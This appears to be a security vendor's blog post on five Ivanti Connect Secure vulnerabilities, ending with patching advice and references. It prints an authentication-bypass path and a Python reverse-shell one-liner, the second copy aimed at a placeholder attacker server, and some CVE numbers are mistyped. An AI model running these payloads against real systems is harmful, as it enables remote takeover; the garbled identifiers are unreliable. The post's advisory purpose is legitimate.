Ivanti Connect Secure Under Attack: Uncovering Five Exploitable CVEs

Retesting Made Easy With BugDazz
February 5, 2024
Network traffic analysis
What is Network Traffic Analysis: Importances & Best Practices
March 11, 2024

February 17, 2024

Overview 

Recently, five CVEs have been discovered in Ivanti Connect Secure, a software product designed to offer secure remote access to corporate resources and applications. This product is currently trusted by numerous service providers and government entities. These vulnerabilities encompass authentication bypass, command injection, privilege escalation, server-side request forgery, and XML external entity issues, potentially resulting in remote code execution on affected systems. The presence of public exploits in the wild raises significant security concerns for users of this product.

According to the Fofa search engine, there are over 20,000 exploitable servers if they have not yet been patched.

Orange tsai shared the Severity CVE Statistics of the most used VPN providers. Plus Secure had the lowest rate, and the rate raised in the first beginning of this year

A small brief about the five vulnerabilities shared in the Ivanti knowledge base article shows the impact of the threat to the companies using the solution as being high.

The timeline of the CVE patching and related events indicates a gap between the mitigation of the first two discovered CVEs, specifically CVE-2023-56805 and CVE-2024-21887. These CVEs were identified in the second week of December and were exploited in a chain to achieve remote code execution within the victim network. This posed a significant threat from the time of discovery until the release of patches for all exposed servers on the public network.

CVE-2023-46805 authentication bypass in Rest API the exploitation was by accessing /api/v1/cav/client/status/../../admin/options and this exploitation mechanism was discovered by assetnote blog post  and then chained with CVE-2023-21887 over serval vulnerable endpoints to do command injection because it  python server-based

;python -c ‘import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“127.0.0.1”,4444));subprocess.call([“/bin/sh”,”-i”],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())’;

TCP reverse shell 

CVE-2024-21893 the server-side request forgery when the application uses the SMAL method in authentication, the exploitation of this vulnerability was by sending an XML format included http://127.0.0.1:8090/api/v1/license/keys-status/ in XML format using the RetrievalMethod element to trigger the vulnerability 

As shown from a PoC below:

The variable of the attacker_server will be  http://attackerserver+;python -c ‘import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“serverip”,port));subprocess.call([“/bin/sh”,”-i”],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())’; to get a reverse shell back on the server_host and port

Mitigation

The advisory recommends that customers factory reset their devices and apply the patches.

Conclusion

Through our blog, it’s evident that nothing can be considered entirely secure, even seemingly robust applications. Companies must take a proactive approach with regular security code reviews to identify vulnerabilities before attackers exploit them to the detriment of customers. It’s worth highlighting that Ivanti, used by governments and service providers, is particularly vulnerable, placing these entities in a critical position. In the realm of cybersecurity, the concept of absolute security doesn’t exist, emphasizing the need for continual efforts and diligence to safeguard against potential threats and protect the interests of both companies and customers. 

References:

https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/?ref=labs.watchtowr.com

https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887

https://orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf

https://www.cisa.gov/news-events/directives/ed-24-01-mitigate-ivanti-connect-secure-and-ivanti-policy-secure-vulnerabilities#SupplementalDirectionV1

Discover more from SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Subscribe now to keep reading and get access to the full archive.

Continue reading

Enable Notifications OK No thanks